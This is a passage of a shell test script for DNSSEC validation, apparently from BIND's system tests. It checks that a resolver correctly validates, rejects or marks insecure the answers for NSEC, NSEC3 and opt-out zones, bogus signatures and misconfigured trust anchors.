"flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null && ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +if [ -x "${DELV}" ] ; then + ret=0 + echo_i "checking positive wildcard validation OPTOUT using dns_client ($n)" + delv_with_opts @10.53.0.4 a a.wild.optout.example > delv.out$n || ret=1 + grep "a.wild.optout.example..*10.0.0.6" delv.out$n > /dev/null || ret=1 + grep "a.wild.optout.example..*RRSIG.A [0-9][0-9]* 3 300.*" delv.out$n > /dev/null || ret=1 + n=$((n+1)) + test "$ret" -eq 0 || echo_i "failed" + status=$((status+ret)) +fi + +echo_i "checking negative validation NXDOMAIN NSEC ($n)" +ret=0 +dig_with_opts +noauth q.example. @10.53.0.2 a > dig.out.ns2.test$n || ret=1 +dig_with_opts +noauth q.example. @10.53.0.4 a > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns2.test$n dig.out.ns4.test$n || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1 +grep "status: NXDOMAIN" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +if [ -x "${DELV}" ] ; then + ret=0 + echo_i "checking negative validation NXDOMAIN NSEC using dns_client ($n)" + delv_with_opts @10.53.0.4 a q.example > delv.out$n 2>&1 || ret=1 + grep "resolution failed: ncache nxdomain" delv.out$n > /dev/null || ret=1 + n=$((n+1)) + test "$ret" -eq 0 || echo_i "failed" + status=$((status+ret)) +fi + +echo_i "checking negative validation NXDOMAIN NSEC3 ($n)" +ret=0 +dig_with_opts +noauth q.nsec3.example. \ + @10.53.0.3 a > dig.out.ns3.test$n || ret=1 +dig_with_opts +noauth q.nsec3.example. \ + @10.53.0.4 a > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1 +grep "status: NXDOMAIN" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +if [ -x "${DELV}" ] ; then + ret=0 + echo_i "checking negative validation NXDOMAIN NSEC3 using dns_client ($n)" + delv_with_opts @10.53.0.4 a q.nsec3.example > delv.out$n 2>&1 || ret=1 + grep "resolution failed: ncache nxdomain" delv.out$n > /dev/null || ret=1 + n=$((n+1)) + test "$ret" -eq 0 || echo_i "failed" + status=$((status+ret)) +fi + +echo_i "checking negative validation NXDOMAIN OPTOUT ($n)" +ret=0 +dig_with_opts +noauth q.optout.example. \ + @10.53.0.3 a > dig.out.ns3.test$n || ret=1 +dig_with_opts +noauth q.optout.example. \ + @10.53.0.4 a > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns4.test$n > /dev/null || ret=1 +# Note - this is looking for failure, hence the && +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null && ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +if [ -x "${DELV}" ] ; then + ret=0 + echo_i "checking negative validation NXDOMAIN OPTOUT using dns_client ($n)" + delv_with_opts @10.53.0.4 a q.optout.example > delv.out$n 2>&1 || ret=1 + grep "resolution failed: ncache nxdomain" delv.out$n > /dev/null || ret=1 + n=$((n+1)) + test "$ret" -eq 0 || echo_i "failed" + status=$((status+ret)) +fi + +echo_i "checking negative validation NODATA NSEC ($n)" +ret=0 +dig_with_opts +noauth a.example. @10.53.0.2 txt > dig.out.ns2.test$n || ret=1 +dig_with_opts +noauth a.example. @10.53.0.4 txt > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns2.test$n dig.out.ns4.test$n || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +grep "ANSWER: 0" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +if [ -x "${DELV}" ] ; then + ret=0 + echo_i "checking negative validation NODATA OPTOUT using dns_client ($n)" + delv_with_opts @10.53.0.4 txt a.example > delv.out$n 2>&1 || ret=1 + grep "resolution failed: ncache nxrrset" delv.out$n > /dev/null || ret=1 + n=$((n+1)) + test "$ret" -eq 0 || echo_i "failed" + status=$((status+ret)) +fi + +echo_i "checking negative validation NODATA NSEC3 ($n)" +ret=0 +dig_with_opts +noauth a.nsec3.example. \ + @10.53.0.3 txt > dig.out.ns3.test$n || ret=1 +dig_with_opts +noauth a.nsec3.example. \ + @10.53.0.4 txt > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +grep "ANSWER: 0" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +if [ -x "${DELV}" ] ; then + ret=0 + echo_i "checking negative validation NODATA NSEC3 using dns_client ($n)" + delv_with_opts @10.53.0.4 txt a.nsec3.example > delv.out$n 2>&1 || ret=1 + grep "resolution failed: ncache nxrrset" delv.out$n > /dev/null || ret=1 + n=$((n+1)) + test "$ret" -eq 0 || echo_i "failed" + status=$((status+ret)) +fi + +echo_i "checking negative validation NODATA OPTOUT ($n)" +ret=0 +dig_with_opts +noauth a.optout.example. \ + @10.53.0.3 txt > dig.out.ns3.test$n || ret=1 +dig_with_opts +noauth a.optout.example. \ + @10.53.0.4 txt > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +grep "ANSWER: 0" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +if [ -x "${DELV}" ] ; then + ret=0 + echo_i "checking negative validation NODATA OPTOUT using dns_client ($n)" + delv_with_opts @10.53.0.4 txt a.optout.example > delv.out$n 2>&1 || ret=1 + grep "resolution failed: ncache nxrrset" delv.out$n > /dev/null || ret=1 + n=$((n+1)) + test "$ret" -eq 0 || echo_i "failed" + status=$((status+ret)) +fi + +echo_i "checking negative wildcard validation NSEC ($n)" +ret=0 +dig_with_opts b.wild.example. @10.53.0.2 txt > dig.out.ns2.test$n || ret=1 +dig_with_opts b.wild.example. @10.53.0.4 txt > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns2.test$n dig.out.ns4.test$n || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +if [ -x "${DELV}" ] ; then + ret=0 + echo_i "checking negative wildcard validation NSEC using dns_client ($n)" + delv_with_opts @10.53.0.4 txt b.wild.example > delv.out$n 2>&1 || ret=1 + grep "resolution failed: ncache nxrrset" delv.out$n > /dev/null || ret=1 + n=$((n+1)) + test "$ret" -eq 0 || echo_i "failed" + status=$((status+ret)) +fi + +echo_i "checking negative wildcard validation NSEC3 ($n)" +ret=0 +dig_with_opts b.wild.nsec3.example. @10.53.0.3 txt > dig.out.ns3.test$n || ret=1 +dig_with_opts b.wild.nsec3.example. @10.53.0.4 txt > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +if [ -x "${DELV}" ] ; then + ret=0 + echo_i "checking negative wildcard validation NSEC3 using dns_client ($n)" + delv_with_opts @10.53.0.4 txt b.wild.nsec3.example > delv.out$n 2>&1 || ret=1 + grep "resolution failed: ncache nxrrset" delv.out$n > /dev/null || ret=1 + n=$((n+1)) + test "$ret" -eq 0 || echo_i "failed" + status=$((status+ret)) +fi + +echo_i "checking negative wildcard validation OPTOUT ($n)" +ret=0 +dig_with_opts b.wild.optout.example. \ + @10.53.0.3 txt > dig.out.ns3.test$n || ret=1 +dig_with_opts b.wild.optout.example. \ + @10.53.0.4 txt > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +# Note - this is looking for failure, hence the && +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null && ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +if [ -x "${DELV}" ] ; then + ret=0 + echo_i "checking negative wildcard validation OPTOUT using dns_client ($n)" + delv_with_opts @10.53.0.4 txt b.optout.nsec3.example > delv.out$n 2>&1 || ret=1 + grep "resolution failed: ncache nxrrset" delv.out$n > /dev/null || ret=1 + n=$((n+1)) + test "$ret" -eq 0 || echo_i "failed" + status=$((status+ret)) +fi + +# Check the insecure.example domain + +echo_i "checking 1-server insecurity proof NSEC ($n)" +ret=0 +dig_with_opts +noauth a.insecure.example. @10.53.0.3 a > dig.out.ns3.test$n || ret=1 +dig_with_opts +noauth a.insecure.example. @10.53.0.4 a > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +# Note - this is looking for failure, hence the && +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null && ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +if [ -x "${DELV}" ] ; then + ret=0 + echo_i "checking 1-server insecurity proof NSEC using dns_client ($n)" + delv_with_opts @10.53.0.4 a a.insecure.example > delv.out$n || ret=1 + grep "a.insecure.example..*10.0.0.1" delv.out$n > /dev/null || ret=1 + n=$((n+1)) + test "$ret" -eq 0 || echo_i "failed" + status=$((status+ret)) +fi + +echo_i "checking 1-server insecurity proof NSEC3 ($n)" +ret=0 +dig_with_opts +noauth a.insecure.nsec3.example. @10.53.0.3 a > dig.out.ns3.test$n || ret=1 +dig_with_opts +noauth a.insecure.nsec3.example. @10.53.0.4 a > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +# Note - this is looking for failure, hence the && +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null && ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +if [ -x "${DELV}" ] ; then + ret=0 + echo_i "checking 1-server insecurity proof NSEC3 using dns_client ($n)" + delv_with_opts @10.53.0.4 a a.insecure.nsec3.example > delv.out$n || ret=1 + grep "a.insecure.nsec3.example..*10.0.0.1" delv.out$n > /dev/null || ret=1 + n=$((n+1)) + test "$ret" -eq 0 || echo_i "failed" + status=$((status+ret)) +fi + +echo_i "checking 1-server insecurity proof OPTOUT ($n)" +ret=0 +dig_with_opts +noauth a.insecure.optout.example. @10.53.0.3 a > dig.out.ns3.test$n || ret=1 +dig_with_opts +noauth a.insecure.optout.example. @10.53.0.4 a > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +# Note - this is looking for failure, hence the && +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null && ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +if [ -x "${DELV}" ] ; then + ret=0 + echo_i "checking 1-server insecurity proof OPTOUT using dns_client ($n)" + delv_with_opts @10.53.0.4 a a.insecure.optout.example > delv.out$n || ret=1 + grep "a.insecure.optout.example..*10.0.0.1" delv.out$n > /dev/null || ret=1 + n=$((n+1)) + test "$ret" -eq 0 || echo_i "failed" + status=$((status+ret)) +fi + +echo_i "checking 1-server negative insecurity proof NSEC ($n)" +ret=0 +dig_with_opts q.insecure.example. a @10.53.0.3 \ + > dig.out.ns3.test$n || ret=1 +dig_with_opts q.insecure.example. a @10.53.0.4 \ + > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns4.test$n > /dev/null || ret=1 +# Note - this is looking for failure, hence the && +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null && ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +if [ -x "${DELV}" ] ; then + ret=0 + echo_i "checking 1-server negative insecurity proof NSEC using dns_client ($n)" + delv_with_opts @10.53.0.4 a q.insecure.example > delv.out$n 2>&1 || ret=1 + grep "resolution failed: ncache nxdomain" delv.out$n > /dev/null || ret=1 + n=$((n+1)) + test "$ret" -eq 0 || echo_i "failed" + status=$((status+ret)) +fi + +echo_i "checking 1-server negative insecurity proof NSEC3 ($n)" +ret=0 +dig_with_opts q.insecure.nsec3.example. a @10.53.0.3 \ + > dig.out.ns3.test$n || ret=1 +dig_with_opts q.insecure.nsec3.example. a @10.53.0.4 \ + > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns4.test$n > /dev/null || ret=1 +# Note - this is looking for failure, hence the && +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null && ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +if [ -x "${DELV}" ] ; then + ret=0 + echo_i "checking 1-server negative insecurity proof NSEC3 using dns_client ($n)" + delv_with_opts @10.53.0.4 a q.insecure.nsec3.example > delv.out$n 2>&1 || ret=1 + grep "resolution failed: ncache nxdomain" delv.out$n > /dev/null || ret=1 + n=$((n+1)) + test "$ret" -eq 0 || echo_i "failed" + status=$((status+ret)) +fi + +echo_i "checking 1-server negative insecurity proof OPTOUT ($n)" +ret=0 +dig_with_opts q.insecure.optout.example. a @10.53.0.3 \ + > dig.out.ns3.test$n || ret=1 +dig_with_opts q.insecure.optout.example. a @10.53.0.4 \ + > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns4.test$n > /dev/null || ret=1 +# Note - this is looking for failure, hence the && +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null && ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +if [ -x "${DELV}" ] ; then + ret=0 + echo_i "checking 1-server negative insecurity proof OPTOUT using dns_client ($n)" + delv_with_opts @10.53.0.4 a q.insecure.optout.example > delv.out$n 2>&1 || ret=1 + grep "resolution failed: ncache nxdomain" delv.out$n > /dev/null || ret=1 + n=$((n+1)) + test "$ret" -eq 0 || echo_i "failed" + status=$((status+ret)) +fi + +echo_i "checking 1-server negative insecurity proof with SOA hack NSEC ($n)" +ret=0 +dig_with_opts r.insecure.example. soa @10.53.0.3 \ + > dig.out.ns3.test$n || ret=1 +dig_with_opts r.insecure.example. soa @10.53.0.4 \ + > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns4.test$n > /dev/null || ret=1 +grep "0 IN SOA" dig.out.ns4.test$n > /dev/null || ret=1 +# Note - this is looking for failure, hence the && +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null && ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "checking 1-server negative insecurity proof with SOA hack NSEC3 ($n)" +ret=0 +dig_with_opts r.insecure.nsec3.example. soa @10.53.0.3 \ + > dig.out.ns3.test$n || ret=1 +dig_with_opts r.insecure.nsec3.example. soa @10.53.0.4 \ + > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns4.test$n > /dev/null || ret=1 +grep "0 IN SOA" dig.out.ns4.test$n > /dev/null || ret=1 +# Note - this is looking for failure, hence the && +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null && ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "checking 1-server negative insecurity proof with SOA hack OPTOUT ($n)" +ret=0 +dig_with_opts r.insecure.optout.example. soa @10.53.0.3 \ + > dig.out.ns3.test$n || ret=1 +dig_with_opts r.insecure.optout.example. soa @10.53.0.4 \ + > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns4.test$n > /dev/null || ret=1 +grep "0 IN SOA" dig.out.ns4.test$n > /dev/null || ret=1 +# Note - this is looking for failure, hence the && +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null && ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +# Check the secure.example domain + +echo_i "checking multi-stage positive validation NSEC/NSEC ($n)" +ret=0 +dig_with_opts +noauth a.secure.example. \ + @10.53.0.3 a > dig.out.ns3.test$n || ret=1 +dig_with_opts +noauth a.secure.example. \ + @10.53.0.4 a > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "checking multi-stage positive validation NSEC/NSEC3 ($n)" +ret=0 +dig_with_opts +noauth a.nsec3.example. \ + @10.53.0.3 a > dig.out.ns3.test$n || ret=1 +dig_with_opts +noauth a.nsec3.example. \ + @10.53.0.4 a > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "checking multi-stage positive validation NSEC/OPTOUT ($n)" +ret=0 +dig_with_opts +noauth a.optout.example. \ + @10.53.0.3 a > dig.out.ns3.test$n || ret=1 +dig_with_opts +noauth a.optout.example. \ + @10.53.0.4 a > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "checking multi-stage positive validation NSEC3/NSEC ($n)" +ret=0 +dig_with_opts +noauth a.secure.nsec3.example. \ + @10.53.0.3 a > dig.out.ns3.test$n || ret=1 +dig_with_opts +noauth a.secure.nsec3.example. \ + @10.53.0.4 a > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "checking multi-stage positive validation NSEC3/NSEC3 ($n)" +ret=0 +dig_with_opts +noauth a.nsec3.nsec3.example. \ + @10.53.0.3 a > dig.out.ns3.test$n || ret=1 +dig_with_opts +noauth a.nsec3.nsec3.example. \ + @10.53.0.4 a > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "checking multi-stage positive validation NSEC3/OPTOUT ($n)" +ret=0 +dig_with_opts +noauth a.optout.nsec3.example. \ + @10.53.0.3 a > dig.out.ns3.test$n || ret=1 +dig_with_opts +noauth a.optout.nsec3.example. \ + @10.53.0.4 a > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "checking multi-stage positive validation OPTOUT/NSEC ($n)" +ret=0 +dig_with_opts +noauth a.secure.optout.example. \ + @10.53.0.3 a > dig.out.ns3.test$n || ret=1 +dig_with_opts +noauth a.secure.optout.example. \ + @10.53.0.4 a > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "checking multi-stage positive validation OPTOUT/NSEC3 ($n)" +ret=0 +dig_with_opts +noauth a.nsec3.optout.example. \ + @10.53.0.3 a > dig.out.ns3.test$n || ret=1 +dig_with_opts +noauth a.nsec3.optout.example. \ + @10.53.0.4 a > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "checking multi-stage positive validation OPTOUT/OPTOUT ($n)" +ret=0 +dig_with_opts +noauth a.optout.optout.example. \ + @10.53.0.3 a > dig.out.ns3.test$n || ret=1 +dig_with_opts +noauth a.optout.optout.example. \ + @10.53.0.4 a > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "checking empty NODATA OPTOUT ($n)" +ret=0 +dig_with_opts +noauth empty.optout.example. \ + @10.53.0.3 a > dig.out.ns3.test$n || ret=1 +dig_with_opts +noauth empty.optout.example. \ + @10.53.0.4 a > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +#grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +# Check the bogus domain + +echo_i "checking failed validation ($n)" +ret=0 +dig_with_opts a.bogus.example. @10.53.0.4 a > dig.out.ns4.test$n || ret=1 +grep "SERVFAIL" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +if [ -x "${DELV}" ] ; then + ret=0 + echo_i "checking failed validation using dns_client ($n)" + delv_with_opts +cd @10.53.0.4 a a.bogus.example > delv.out$n 2>&1 || ret=1 + grep "resolution failed: RRSIG failed to verify" delv.out$n > /dev/null || ret=1 + n=$((n+1)) + test "$ret" -eq 0 || echo_i "failed" + status=$((status+ret)) +fi + +# Try validating with a bad trusted key. +# This should fail. + +echo_i "checking that validation fails with a misconfigured trusted key ($n)" +ret=0 +dig_with_opts example. soa @10.53.0.5 > dig.out.ns5.test$n || ret=1 +grep "SERVFAIL" dig.out.ns5.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "checking that negative validation fails with a misconfigured trusted key ($n)" +ret=0 +dig_with_opts example. ptr @10.53.0.5 > dig.out.ns5.test$n || ret=1 +grep "SERVFAIL" dig.out.ns5.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "checking that insecurity proofs fail with a misconfigured trusted key ($n)" +ret=0 +dig_with_opts a.insecure.example. a @10.53.0.5 > dig.out.ns5.test$n || ret=1 +grep "SERVFAIL" dig.out.ns5.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "checking that validation fails when key record is missing ($n)" +ret=0 +dig_with_opts a.b.keyless.example. a @10.53.0.4 > dig.out.ns4.test$n || ret=1 +grep "SERVFAIL" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +if [ -x "${DELV}" ] ; then + ret=0 + echo_i "checking that validation fails when key record is missing using dns_client ($n)" + delv_with_opts +cd @10.53.0.4 a a.b.keyless.example > delv.out$n 2>&1 || ret=1 + grep "resolution failed: insecurity proof failed" delv.out$n > /dev/null || ret=1 + n=$((n+1)) + test "$ret" -eq 0 || echo_i "failed" + status=$((status+ret)) +fi + +echo_i "checking that validation succeeds when a revoked key is encountered ($n)" +ret=0 +dig_with_opts revkey.example soa @10.53.0.4 > dig.out.ns4.test$n || ret=1 +grep "NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +grep "flags: .* ad" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +if [ -x "${DELV}" ] ; then + ret=0 + echo_i "checking that validation succeeds when a revoked key is encountered using dns_client ($n)" + delv_with_opts +cd @10.53.0.4 soa revkey.example > delv.out$n 2>&1 || ret=1 + grep "fully validated" delv.out$n > /dev/null || ret=1 + n=$((n+1)) + test "$ret" -eq 0 || echo_i "failed" + status=$((status+ret)) +fi + +echo_i "Checking that a bad CNAME signature is caught after a +CD query ($n)" +ret=0 +#prime +dig_with_opts +cd bad-cname.example. @10.53.0.4 > dig.out.ns4.prime$n || ret=1 +#check: requery with +CD. pending data should be returned even if it's bogus +expect="a.example. +10.0.0.1" +ans=$(dig_with_opts +cd +nodnssec +short bad-cname.example. @10.53.0.4) || ret=1 +test "$ans" = "$expect" || ret=1 +test "$ret" -eq 0 || echo_i "failed, got '$ans', expected '$expect'" +#check: requery without +CD. bogus cached data should be rejected. +dig_with_opts +nodnssec bad-cname.example. @10.53.0.4 > dig.out.ns4.test$n || ret=1 +grep "SERVFAIL" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "Checking that a bad DNAME signature is caught after a +CD query ($n)" +ret=0 +#prime +dig_with_opts +cd a.bad-dname.example. @10.53.0.4 > dig.out.ns4.prime$n || ret=1 +#check: requery with +CD. pending data should be returned even if it's bogus +expect="example. +a.example. +10.0.0.1" +ans=$(dig_with_opts +cd +nodnssec +short a.bad-dname.example. @10.53.0.4) || ret=1 +test "$ans" = "$expect" || ret=1 +test "$ret" -eq 0 || echo_i "failed, got '$ans', expected '$expect'" +#check: requery without +CD. bogus cached data should be rejected. +dig_with_opts +nodnssec a.bad-dname.example. @10.53.0.4 > dig.out.ns4.test$n || ret=1 +grep "SERVFAIL" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +# Check the insecure.secure.example domain (insecurity proof) + +echo_i "checking 2-server insecurity proof ($n)" +ret=0 +dig_with_opts +noauth a.insecure.secure.example. @10.53.0.2 a \ + > dig.out.ns2.test$n || ret=1 +dig_with_opts +noauth a.insecure.secure.example. @10.53.0.4 a \ + > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns2.test$n dig.out.ns4.test$n || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +# Note - this is looking for failure, hence the && +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null && ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +# Check a negative response in insecure.secure.example + +echo_i "checking 2-server insecurity proof with a negative answer ($n)" +ret=0 +dig_with_opts q.insecure.secure.example. @10.53.0.2 a > dig.out.ns2.test$n \ + || ret=1 +dig_with_opts q.insecure.secure.example. @10.53.0.4 a > dig.out.ns4.test$n \ + || ret=1 +digcomp dig.out.ns2.test$n dig.out.ns4.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns4.test$n > /dev/null || ret=1 +# Note - this is looking for failure, hence the && +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null && ret=1 +n=$((n+1)) +test "$ret" -eq 0 || echo_i "failed" +status=$((status+ret)) + +echo_i "checking 2-server insecurity proof with a negative answer and SOA hack ($n)" +ret=0 +dig_with_opts r.insecure.secure.example. @10.53.0.2 soa > dig.out.ns2.test$n \ 